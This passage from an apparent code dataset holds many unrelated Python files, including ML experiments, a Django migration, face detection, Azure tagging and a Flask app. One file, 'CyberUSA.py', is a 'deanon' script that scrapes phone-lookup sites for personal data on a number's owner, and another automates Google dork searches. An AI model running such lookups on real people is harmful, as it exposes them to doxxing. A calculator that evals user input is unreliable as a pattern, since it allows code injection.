:type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n if matrix == []: return False\n Y = len(matrix[0])\n for m in matrix:\n idx = bisect_left(m, target)\n if idx < Y and m[idx] == target: return True\n return False\n","sub_path":"240_search-a-2d-matrix-ii.py","file_name":"240_search-a-2d-matrix-ii.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"20726424","text":"import pandas as pd\nfrom sklearn.metrics.cluster import adjusted_rand_score\nimport numpy as np\nimport Comparison\nimport sys\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom SplitData import Spliter\nfrom bisect_louvain import * #import louvain clustering \nfrom SemiClassifier import SemiClassifier\n\nfor prefixFileName in [\"pollen\", \"patel\", \"baron\"]:\n# for prefixFileName in [\"pollen\"]:\n print(\"===========================================================================\")\n print(\"===========================================================================\")\n fileName = \"Data/\" + prefixFileName + \"-prepare-log_count_100pca.csv\"\n df = pd.read_csv(fileName)\n Xy= df.values\n X= Xy[:,1:]\n y= Xy[:,0].astype(int)\n for left_out_proportion in [0.0, 0.2, 0.5, 0.9]:\n # for left_out_proportion in [0.5]:\n # print(\"===================xxxxxxxxxxxxxxxxxxxxxxx================================\")\n print(\"Data: \", prefixFileName, \", left_out_proportion = \", left_out_proportion)\n for data_seed in range(5):\n proportion_unknown = 0.2\n \n spl = Spliter(proportion_unknown = proportion_unknown, left_out_proportion = left_out_proportion, random_seed = data_seed)\n train_indices, test_indices, unknown_classes = spl.Split(X, y)\n \n X_train = X[train_indices]\n X_test = X[test_indices]\n y_train = y[train_indices]\n y_test = y[test_indices]\n\n k1 = len(set(y_test))\n k2 = len(set(y))\n \n y_louvain = louvain_exact_K(X_test, k1)\n\n # y_full_louvain = louvain_exact_K(X[train_indices+test_indices], k2)\n # y_full_louvain = y_full_louvain[len(y_train): len(y)]\n\n # just joint clustering \n y_full_semilouvain = semi_louvain_exact_K(X_train, y_train, X_test, k2)\n y_full_semilouvain = y_full_semilouvain[len(y_train): len(y)]\n\n # joint clustering + SVM \n clf = SemiClassifier()\n y_predict = clf.predict(X_train, y_train, X_test, k2 + 1)\n\n print(\"Louvain on test set: \", adjusted_rand_score(y_louvain, y_test))\n # print(\"Louvain on full set: \", adjusted_rand_score(y_full_louvain, y_test))\n print(\"Semi-Louvain ARI : \", adjusted_rand_score(y_full_semilouvain, y_test))\n print(\"Semi-LouSVM ARI : \", adjusted_rand_score(y_predict, y_test))\n\n # print(\"Train class: \", np.unique(y_train))\n # print(\"New class: \", set(y_test).difference(set(y_train)))\n # print(y_test)\n # print(y_predict)\n print(\"========================================================\")\n \n \n \n \n","sub_path":"test_semi_classifier.py","file_name":"test_semi_classifier.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511172623","text":"import argparse\nimport rnn_estimator_factory\nimport tempfile\n\nif __name__ == '__main__':\n # parse command line argument for hyper parameter input\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--output_dir',\n help='location to write checkpoints and export trained model',\n required=True\n )\n parser.add_argument(\n '--model_version',\n help='Specify the version of the recurrent model with attention to train. [lstm_attention, gru_attention] ',\n required=True\n )\n parser.add_argument(\n '--embedding_path',\n help='Optional, path to the embedding location'\n )\n parser.add_argument(\n '--embedding_dim',\n help='Optional, the dimension of the embedding to be used, if pre trained embedding is specified, should match with the embedding',\n type=int,\n default=200\n )\n parser.add_argument(\n '--num_epochs',\n help='Number of epochs to go through the data, default to 10',\n default=10,\n type=int\n )\n parser.add_argument(\n '--batch_size',\n help='number of records to read during each training step, default to 100',\n default=100,\n type=int\n )\n parser.add_argument(\n '--learning_rate',\n help='learning rate for gradient descent, required for model train',\n default=0.00001,\n type=float\n )\n parser.add_argument(\n '--dropout_rate',\n help='dropout rate used inside the convolutional network to regularize model from being overfit',\n default=0.2,\n type=float\n )\n parser.add_argument(\n '--vocab_size',\n help='set the size limit of text corpus used on the tokenization for sentence vocabulary',\n default=50000,\n type=int\n )\n parser.add_argument(\n '--max_sequence_length',\n help='set the limit of maximum sequence length used for padding',\n default=300,\n type=int\n )\n parser.add_argument(\n '--rnn_units',\n help='Specifies the dimension of the RNN weights',\n type=int\n )\n\n\n args, _ = parser.parse_known_args()\n hparams = args.__dict__\n output_dir = hparams.pop('output_dir')\n\n rnn_estimator_factory.MAX_SEQUENCE_LENGTH = hparams.pop('max_sequence_length')\n rnn_estimator_factory.VOCAB_SIZE= hparams.pop('vocab_size')\n rnn_estimator_factory.EMBEDDING_DIM= hparams.pop('embedding_dim')\n \n\n # Initialize the training and evaluation\n rnn_estimator_factory.train_and_evaluate(output_dir, hparams)","sub_path":"estimator_RNN/rnn_estimator_task.py","file_name":"rnn_estimator_task.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529380536","text":"from enum import Enum\r\nfrom datetime import datetime\r\nfrom abc import *\r\n\r\nquantity_list = []\r\n\r\n\r\nclass Item_Type(Enum):\r\n ENTRY = 1\r\n PREMIUM = 2\r\n HIGH_END = 3\r\n NOT_ASSIGNED = None\r\n\r\n\r\nclass Item:\r\n def __init__(self, id: int):\r\n self.id = id\r\n self.type = -1\r\n self.price = 1000\r\n self.quantity = 1000\r\n self.last_updated = None\r\n self.replenished = 0\r\n\r\n\r\n def retrieve(self, qty, date):\r\n self.last_updated = date\r\n self.quantity -= qty\r\n print(self.quantity)\r\n print(qty)\r\n quantity_list.append(self.quantity)\r\n print(quantity_list)\r\n if self.quantity < 10:\r\n self.quantity = 50\r\n self.replenished += 1\r\n\r\n\r\n\r\n\r\nclass Customer:\r\n ID_Cnt = 0\r\n store_name = \"ISE4032\"\r\n\r\n def __init__(self, l_name: str, f_name: str):\r\n self.last_name = l_name # (1) 클래스 각자에 소속된 변수\r\n self.first_name = f_name\r\n self.reg_date = None\r\n self.birth_date = None\r\n self.gender = None\r\n self.total_won = 0\r\n self.num_purchase = 0\r\n self.last_visited = None\r\n self.id = Customer.get_id(self)\r\n\r\n def __str__(self): # __str__ 오버라이딩 - 디버깅할 때 편하게 만듦\r\n return '[' + str(self.id) + ']' + str(self.last_name) + ' ' + str(self.first_name)\r\n\r\n def get_id(self):\r\n Customer.ID_Cnt += 1\r\n return Customer.ID_Cnt\r\n\r\n def consume(self, target_item: Item, qty, date):\r\n self.num_purchase += 1\r\n self.total_won += target_item.price * qty\r\n self.last_visited = date\r\n target_item.retrieve(qty, date)\r\n\r\n\r\n def reset_record(self):\r\n self.num_purchase = 0\r\n self.total_won = 0\r\n self.last_visited = None\r\n return self\r\n\r\n\r\nclass Member(Customer): # Customer를 상속\r\n # pass # 부모의 변수 및 함수를 그대로 사용 (__init__ 까지)\r\n # 오버라이딩\r\n def __init__(self, l_name: str, f_name: str, since): # since라는 새로운 인자를 받아옴\r\n self.member_since = since\r\n super().__init__(l_name, f_name) # 오버라이딩 + 부모의 본연의 기능까지 가져옴\r\n\r\n def consume(self, target_item: Item, qty, date): # consume이라는 함수를 오버라이딩해서 새 함수로! + 할인까지\r\n self.num_purchase += 1\r\n discount_rate = self.get_discount_rate()\r\n self.total_won += target_item.price * qty * (1 - discount_rate)\r\n print('Membership Discount - ' + str(self) + ' gets ' + str(100 * discount_rate) + '%')\r\n self.last_visited = date\r\n target_item.retrieve(qty, date)\r\n\r\n def get_discount_rate(self): # 할인률 계산을 하는 새로운 함수를 선언 - Member에만 존재\r\n time_now = datetime.now()\r\n time_diff = time_now - self.member_since\r\n if time_diff.days > 90:\r\n return 0.05\r\n else:\r\n return 0.01\r\n\r\n\r\nclass ItemBase(metaclass=ABCMeta): # ABC- Abstract Base Class Meta 추상클래스를 사용하기 위한 문법\r\n @abstractmethod # 데코레이터를 이용한 메소드 정의\r\n def retrieve(self):\r\n pass\r\n\r\n @abstractmethod\r\n def get_stock(self):\r\n print('Retrieved!')\r\n\r\n\r\nclass Item_New(ItemBase):\r\n def retrieve(self):\r\n print('[New] Retrieved!')\r\n\r\n def get_stock(self):\r\n pass\r\n\r\n","sub_path":"jts_project/ise4032_class.py","file_name":"ise4032_class.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"41971963","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport csv\nimport seaborn as sns\n\ndf = pd.read_csv('resource_v4.csv', header=None)\n\na = np.array(df)\n\ncount_row = a.shape[0]\ncount_col = a.shape[1]\nprint(\"row\", count_row)\nprint(\"col\", count_col)\n\ncount = 0\n# for indexing location of the resource\nidx = 0\nA = np.zeros((100))\nB = np.zeros((100))\nx = np.array(range(1,101))\n\n\nfor j in range(0, count_col):\n A[a[0][j]-1] = A[a[0][j]-1]+1\nfor j in range(0, count_col):\n B[a[1][j]-1] = B[a[1][j]-1]+1\nplt.bar(x, A, color='b')\nplt.bar(x, B, color='r', bottom=A)\n\n\nprint(\"check the loop result\")\n#print(overArr)\n\n#plt.bar(x,overArr)\nyy= np.array(range(2+2))\nplt.yticks(yy)\nplt.title('count overlapping resource_rho168_30')\n#plt.show()\nplt.savefig(\"overlapping rho168_30\")\n","sub_path":"sim30/rho168/30/자원분표.py","file_name":"자원분표.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"373373684","text":"# 자연수 N이 있다. N의 10진법 표기에서 나타나는 숫자들을 재배열해서\n# N 보다 큰 N의 배수 (2N, 3N ,.. k*N)를 만들 수 있는지 판단하라.\n\nfrom itertools import permutations\n\nT = int(input())\n\nfor t in range(1, T+1):\n check = False\n NumList = []\n N = input()\n\n for i in permutations(N, len(N)):\n Num = \"\"\n for j in i:\n Num += j\n if Num[0] != '0':\n if int(Num) not in NumList:\n NumList.append(int(Num))\n\n if len(NumList) == 1:\n print(\"#{} impossible\".format(t))\n continue\n\n for i in range(1, len(NumList)):\n if NumList[i] % NumList[0] == 0:\n check = True\n\n if check:\n print(\"#{} possible\".format(t))\n else:\n print(\"#{} impossible\".format(t))","sub_path":"SWEA/D3/숫자가 같은 배수.py","file_name":"숫자가 같은 배수.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"279351441","text":"import requests\nimport html2text\nimport bs4\nimport os\nos.system('clear')\nbanner = 'Разработчик: CyberUSA\\nVK: https://vk.com/CyberUSA\\nТелеграм: @CyberUSA\\n\\n'\n\nprint(banner)\nprint('CYBER DEANONE V 1.1')\n\ndef avito():\n\tprint('Парсер данных с авито\\n')\n\tphone = input('Введите номер: +7')\n\tres = requests.get('https://mirror.bullshit.agency/search_by_phone/' + phone)\n\tb=bs4.BeautifulSoup(res.text, \"html.parser\")\n\n\tp = b.select('.text-muted')\n\tk = 0\n\tfor i in p:\n\t\tps = p[k].getText()\n\t\tprint(ps.strip())\n\t\tk=k+1\n\n##avito(phone)\n##input('Нажмите что бы продолжить')\n\n\ndef operator():\n\t\n\tphone = input('Введите номер: +7')\n\tres = requests.get('https://tel-search.ru/numbers/phone=' + phone)\n\tb=bs4.BeautifulSoup(res.text, \"html.parser\")\n\tp = b.select('.jumbotron')\n\tk = 0\n\tos.system('clear')\n\tprint('Данные по номеру\\n\\n')\n\tfor i in p:\n\t\tps = p[k].getText()\n\t\tprint(ps.strip(), '\\n\\n')\n\t\tk=k+1\n\t\t\n\t\t\noperator()\ninput('\\nНажмите ENTER\\n\\n')\nos.system('clear')\navito()\n","sub_path":"CyberUSA.py","file_name":"CyberUSA.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"132190257","text":"from googlesearch import search\nimport time\nimport json\n\n\nclass Dorks:\n def __init__(self, dork, tld, lang, num, start, stop, pause):\n \"\"\"\n :param dork:\n :param tld:\n :param lang:\n :param num:\n :param start:\n :param stop:\n :param pause:\n \"\"\"\n self.dork = dork\n self.tld = tld\n self.lang = lang\n self.num = num\n self.start = start\n self.stop = stop\n self.pause = pause\n\n def search_list(self):\n counter = 0\n requ = 0\n retorno = []\n for results in search(self.dork, self.tld, self.lang, self.num, self.start, self.stop, self.pause):\n counter = counter + 1\n time.sleep(0.1)\n requ += 1\n if requ >= int(self.num):\n break\n\n data = (counter, results)\n retorno.append(results)\n return retorno\n\n def search_json(self):\n result = [{\"url\": i} for i in self.search_list()]\n return result\n json_data = json.loads(result)\n return json.dump(json_data)\n\n def search(self):\n counter = 0\n requ = 0\n for results in search(self.dork, self.tld, self.lang, self.num, self.start, self.stop, self.pause):\n counter = counter + 1\n time.sleep(0.1)\n requ += 1\n if requ >= int(self.num):\n break\n\n data = (counter, results)\n return results\n\n\n#a = Dorks(dork='site:elera.com +filetype:pdf', tld='com', lang='en', num=30, start=0, stop=2, pause=2).search()\n#print(a)\n","sub_path":"blackdogosint/osint/Search/google/dorks.py","file_name":"dorks.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"228656082","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"\nCache temperature specifies how the browser cache should be configured before\nthe page run.\n\nSee design doc for details:\nhttps://docs.google.com/document/u/1/d/12D7tkhZi887g9d0U2askU9JypU_wYiEI7Lw0bfwxUgA\n\"\"\"\n\nimport logging\nfrom telemetry.core import util\n\n# Default Cache Temperature. The page doesn't care which browser cache state\n# it is run on.\nANY = 'any'\n# Emulates PageCycler V1 cold runs. Clears system DNS cache, browser DiskCache,\n# net/ predictor cache, and net/ host resolver cache.\nPCV1_COLD = 'pcv1-cold'\n# Emulates PageCycler V1 warm runs. Ensures that the page was visited at least\n# once just before the run.\nPCV1_WARM = 'pcv1-warm'\n\n\ndef EnsurePageCacheTemperature(page, browser, previous_page=None):\n temperature = page.cache_temperature\n logging.info('PageCacheTemperature: %s', temperature)\n\n if temperature == ANY:\n return\n elif temperature == PCV1_COLD:\n any_valid_tab = browser.tabs[0]\n any_valid_tab.ClearCache(force=True)\n elif temperature == PCV1_WARM:\n if (previous_page is not None and\n previous_page.url == page.url and\n (previous_page.cache_temperature == PCV1_COLD or\n previous_page.cache_temperature == PCV1_WARM)):\n return\n\n tab = browser.tabs[0]\n tab.ExecuteJavaScript(\n \"\"\"console.time('telemetry.internal.warmCache.start');\"\"\")\n tab.ExecuteJavaScript(\n \"\"\"console.timeEnd('telemetry.internal.warmCache.start');\"\"\")\n tab.Navigate(page.url)\n util.WaitFor(tab.HasReachedQuiescence, 60)\n tab.WaitForDocumentReadyStateToBeComplete()\n tab.Navigate(\"about:blank\")\n tab.WaitForDocumentReadyStateToBeComplete()\n tab.ExecuteJavaScript(\n \"\"\"console.time('telemetry.internal.warmCache.end');\"\"\")\n tab.ExecuteJavaScript(\n \"\"\"console.timeEnd('telemetry.internal.warmCache.end');\"\"\")\n","sub_path":"telemetry/telemetry/page/cache_temperature.py","file_name":"cache_temperature.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"485470540","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport directory.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Alumnus',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('gender', models.IntegerField(choices=[(0, b'Male'), (1, b'Female')])),\n ('photo', models.ImageField(null=True, upload_to=directory.models.upload_to_photo)),\n ('cv', models.FileField(null=True, upload_to=directory.models.upload_to_cv)),\n ('phone1', models.CharField(max_length=20, null=True)),\n ('phone2', models.CharField(max_length=20, null=True)),\n ('postal', models.CharField(max_length=160, null=True)),\n ('website', models.URLField(null=True)),\n ('presentation', models.TextField(null=True)),\n ('diploma', models.CharField(max_length=80, null=True)),\n ('company', models.CharField(max_length=160, null=True)),\n ('job', models.CharField(max_length=160, null=True)),\n ('keywords', models.CharField(max_length=1000, null=True)),\n ('privacy', models.BooleanField(default=1, choices=[(0, b'Hide name in the unauthenticated area'), (1, b'Display name in the unauthenticated area')])),\n ],\n ),\n migrations.CreateModel(\n name='Domain',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=80)),\n ],\n ),\n migrations.CreateModel(\n name='Year',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.AddField(\n model_name='alumnus',\n name='domain',\n field=models.ForeignKey(to='directory.Domain', null=True),\n ),\n migrations.AddField(\n model_name='alumnus',\n name='user',\n field=models.OneToOneField(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='alumnus',\n name='year',\n field=models.ForeignKey(to='directory.Year'),\n ),\n ]\n","sub_path":"directory/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"184466680","text":"import numpy as np\nimport cv2\n#from picamera.array import PiRGBArray\n#from picamera import PiCamera\n#import time\n\n# multiple cascades: https://github.com/Itsee/opencv/tree/master/data/haarcascades\n\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_frontalface_default.xml\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_eye.xml\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\ncap = cv2.VideoCapture(0)\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nvideo_writer = cv2.VideoWriter('Output.avi', fourcc, 20, (640,480))\n\nwhile True:\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n \n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex,ey,ew,eh) in eyes:\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n\n cv2.imshow('img',img)\n k = cv2.waitKey(30) & 0xff\n\n \n #If key 'c' is pressed, it will take a picture.\n if k == ord(\"c\"):\n cv2.imwrite('imsexy.png', img)\n \n \n #Record for 5 seconds\n if k == ord(\"r\"):\n while (cap.isOpened()):\n ret, img = cap.read()\n if ret:\n video_writer.write(img)\n cv2.imshow('Video stream', img)\n else:\n break\n \n \n #Quit the \"Frame\" \n if k == ord(\"q\"):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Working.py","file_name":"Working.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212696251","text":"import requests\nfrom azure.mgmt.resource.subscriptions import SubscriptionClient\nfrom azure.mgmt.resource.resources import ResourceManagementClient\n\nfrom azure_identity_credential_adapter import AzureIdentityCredentialAdapter\ncredentials = AzureIdentityCredentialAdapter()\n\nLOCATION = 'westus'\n\nprint('Retrieving AppMetadata')\n\nr = requests.get(\"http://localhost:5000/appmetadata\")\napp_metadata = r.json()\n\nprint('Retrieving Subscriptions')\n\nsubscription_client = SubscriptionClient(credentials)\nsubscriptions = subscription_client.subscriptions.list()\n\nfor subscription in subscriptions:\n resource_client = ResourceManagementClient(\n credentials, subscription.subscription_id)\n\n resources_with_appid_tag = resource_client.resource_groups.list(\n filter=\"tagName eq 'appid'\")\n\n for resource in resources_with_appid_tag:\n print(f'Syncing {resource.name}')\n\n app_metadatum = next(\n (x for x in app_metadata if x['id'] == resource.tags['appid']), None)\n\n if app_metadata != None:\n resource.tags.update({'business-owner': app_metadata[0]['businessOwner'], 'tech-owner': app_metadata[0]['techOwner']})\n tag_update = resource_client.tags.update_at_scope(resource.id, 'Merge', {'tags': resource.tags})\n print(tag_update)\n #tag_update = resource_client.resource_groups.create_or_update(resource.name, {'location': LOCATION, 'tags': resource.tags})\n\nprint('Done')\n","sub_path":"src/scripts/sync_resources_with_appid_tag.py","file_name":"sync_resources_with_appid_tag.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584343790","text":"\"\"\"Main application and routing logic for Open AQ.\"\"\"\nfrom decouple import config\nfrom flask import Flask, render_template, request\nfrom .models import DB, Measurement\nfrom .aq_dashboard import load_measurement, filter_ge_pm25\n\n\ndef create_app():\n \"\"\"Create and configure an instance of the Flask application.\"\"\"\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = config('DATABASE_URL')\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n DB.init_app(app)\n\n @app.route('/')\n def root():\n DB.drop_all()\n DB.create_all()\n status = load_measurement()\n message = \"\"\n m = Measurement.query.all()\n if status != 200:\n message = \"Error loading City air quality\"\n\n return render_template('base.html', title='Cities Air Quality',measurements=m, message=message)\n\n @app.route('/compare', methods=['POST'])\n def compare():\n ge_pm25 = request.values['pm25']\n #import pdb; pdb.set_trace()\n if ge_pm25 != \"\" :\n filtered_measurement = filter_ge_pm25(ge_pm25)\n message = \"PM 2.5 greater or equal to \" + ge_pm25\n else:\n filtered_measurement = Measurement.query.all()\n message=\"All PM 2.5\"\n return render_template('base.html', title='Cities Air Quality',measurements=filtered_measurement, message=message)\n\n @app.route('/reset')\n def reset():\n DB.drop_all()\n DB.create_all()\n return render_template('base.html', title='DB Reset! ')\n\n\n return app\n\n","sub_path":"SC/cityair/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559074373","text":"### this file is made by gohyojun\nimport argparse\nimport os\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom scipy.ndimage.filters import gaussian_filter\nimport numpy as np\n\nfrom tqdm import tqdm\n\"\"\"\nDensity map input out에 대한 입력 출력 간의 관계\ninput : main argument in this file\noutput: denstiy map \n\"\"\"\n\nparser = argparse.ArgumentParser(description=\"generate density map for crane\")\n# image root\nparser.add_argument(\"--image_root\",type=str,help=\"image data root\")\n# ground truth root (대가리에 점찍은거 어디있는지)\nparser.add_argument(\"--ground_truth_root\",type=str,help=\"ground truth root\")\n# output root. densitiy map 어디다 저장할지 (생성해줌)\nparser.add_argument(\"--density_map_root\",type=str,help=\"output densitiy map root\")\n\n\n\"\"\"\"\"\nargument_example\n--image_root /home/gohyojun/바탕화면/Anthroprocene/Dataset/crane --ground_truth_root /home/gohyojun/바탕화면/Anthroprocene/Dataset/crane_labeled --density_map_root /home/gohyojun/바탕화면/Anthroprocene/Dataset/density_map \n\"\"\"\n\n\ndef generate_fixed_kernel_densitymap(image,points,sigma=15):\n '''\n Use fixed size kernel to construct the ground truth density map\n for ShanghaiTech PartB.\n image: the image with type numpy.ndarray and [height,width,channel].\n points: the points corresponding to heads with order [col,row].\n sigma: the sigma of gaussian_kernel to simulate a head.\n '''\n # the height and width of the image\n image_h = image.shape[0]\n image_w = image.shape[1]\n\n # coordinate of heads in the image\n points_coordinate = points\n # quantity of heads in the image\n points_quantity = len(points_coordinate)\n\n # generate ground truth density map\n densitymap = np.zeros((image_h, image_w))\n for point in points_coordinate:\n c = min(int(round(point[0])),image_w-1)\n r = min(int(round(point[1])),image_h-1)\n # point2density = np.zeros((image_h, image_w), dtype=np.float32)\n # point2density[r,c] = 1\n densitymap[r,c] = 1\n # densitymap += gaussian_filter(point2density, sigma=sigma, mode='constant')\n densitymap = gaussian_filter(densitymap, sigma=sigma, mode='constant')\n\n densitymap = densitymap / densitymap.sum() * points_quantity\n return densitymap\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n # TODO Training test\n # phase_list = ['train','test']\n\n if not os.path.exists(args.density_map_root):\n os.mkdir(args.density_map_root)\n image_file_list = os.listdir(args.image_root)\n\n index = 0\n for image_file in tqdm(image_file_list):\n image_path = args.image_root+\"/\" + image_file\n\n if not os.path.isfile(image_path):\n continue\n\n # FIXME\n # math file rule이 같은 이름에 .jpg를 .mat 로\n mat_path = args.ground_truth_root+ \"/\" + image_file\n mat_path = mat_path[0:-3] + \"mat\"\n image = plt.imread(image_path)\n # todo 이거 연관성 써놔야함\n # todo 모든 클래스에대해서 어떻게 저장할지도 생각해놔야함\n # densitymap root\n density_path = args.density_map_root + \"/\" + image_file\n density_path = density_path[0:-3] + \"npy\"\n ################\n \"\"\"\n matlab file debugging.\n \n in matfile\n \n head_class0 : 두루미 성조 \n head_class1\n head_class2\n head_class3\n head_class4\n body_class5\n body_class6\n body_class7\n body_class8\n body_class9\n \"\"\"\n ################\n\n\n mat = loadmat(mat_path)\n points = mat[\"class0\"][0][0][0][0][0]\n\n\n\n\n\n\n\n # points = mat['head_class0'][0][0][0][0][0]\n densitymap = generate_fixed_kernel_densitymap(image, points, sigma=15)\n np.save(density_path,densitymap)\n\n","sub_path":"data_preparation/dmap_for_crane.py","file_name":"dmap_for_crane.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292835065","text":"import glob\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\nfrom collections import Counter\npath = \"files/\"\nfiles = glob.glob(path+\"*.txt\")\n\n# first we need a list of all words in all files.\nfinalDataframe = pd.DataFrame()\nfor file in files:\n with open(file, mode=\"r\") as f:\n data = f.read()\n # Split data into array of words, non case sensitive\n word = re.split(r\"\\W+\", data, flags=re.IGNORECASE)\n # Remove withe spaces and empty strings\n cleanWords = [line for line in [l.strip() for l in word] if line]\n # Remove duplicates, we don't want them\n words = list(set(cleanWords))\n # Add data into dictionary\n dictionary = {\"filename\":file, \"values\":pd.Series(words)}\n finalDataframe = finalDataframe.append(pd.DataFrame(dictionary))\n \n \n# list of words in total\nwordstmp = finalDataframe['values']\ndic2 = { \"words\" : wordstmp }\ndf1 = pd.DataFrame(dic2)\ndf1 = df1.set_index(\"words\")\n\nsss2 = [finalDataframe['filename']=='files/file2.txt']\nsss1 = [finalDataframe['filename']=='files/file1.txt']\nsss1[0]\n\ndd1=list(sss1[0])\ndf1['file1']= dd1\n\ndd2=list(sss2[0])\ndf1['file2']=dd2\n\nfinalDataframe['file1']=dd1\nfinalDataframe['file2']=dd2\n\ntest1=pd.pivot_table(finalDataframe, values=['file1','file2'],index=['values'])\n\ntest3 = pd.crosstab(finalDataframe['values'], finalDataframe['filename'], margins=True)\n\n\n# Remove last column which is the total. We don't need this.\ntest3 = test3.drop(columns=['All'])\nfor file in list(test3.columns.values):\n test3[file].replace([0,1],['',file],inplace=True)\n\nchale1=test3.apply(lambda x: x.tolist(), axis=1)\n","sub_path":"introds/introds/hw/l1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458952225","text":"cdtest = 0\ncduptime = 0\ncdcommands = 0\ncdgarbo = 0\ncdtagface = 0\ncdfaq = 0\ncdmemes = 0\ncdkirby = 0\ncduuptime = 0\ncdimportant = 0\ncdwr = 0\ncdcandy = 0\ncdsellout = 0\ncdtjfreak = 0\ncdkeyboard = 0\ncdwannabes = 0\ncd = 0\n","sub_path":"cd.py","file_name":"cd.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"613630403","text":"# urllib 的封装\nimport requests\n\nurl = \"http://www.baidu.com/s?\"\n\nparams = {\"wd\":\"笔记本\"}\nheaders = {\n \"User-Agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\"\n}\n# get == urllib.request.urlopen\nresponse = requests.get(url,params=params,headers=headers)\n# \n# \nprint(response)\nprint(type(response))\n# 获取字节数据 == read()\nhtmlBytes = response.content\n# 解码\nprint(htmlBytes.decode())","sub_path":"0604/5.requests第三方库的使用.py","file_name":"5.requests第三方库的使用.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"413098637","text":"import tkinter as tk\nimport parser # Used for conversion of string to expressions\nroot = tk.Tk()\nroot.title(\"calculator\")\n\ni = 0\n\n# ===============================================================================================================\n\n\n# Step 2\n# Creating functionality for inserting button values to entry form\n\n\ndef insertValueToEntryForm(num):\n global i\n display.insert(i, num) # Takes (index position, value)\n i += 1\n\n\n# Creating functionality for clear\ndef clear():\n display.delete(0, tk.END) # Takes (starting position, ending position)\n\n\n# Creating functionality for undo function\n# def undo():\n# string = display.get() # To get the elements of entry form\n# # print(string)\n# if(string):\n# string = string[:-1]\n# # print(string)\n# clear()\n# display.insert(0, string)\n# else:\n# clear()\n\n\n# Calculating the values\ndef calculate():\n string = display.get()\n try:\n # expr is to convert string in expression and eval to calculate\n result = eval(parser.expr(string).compile())\n # print(result)\n clear()\n display.insert(0, result)\n except Exception:\n 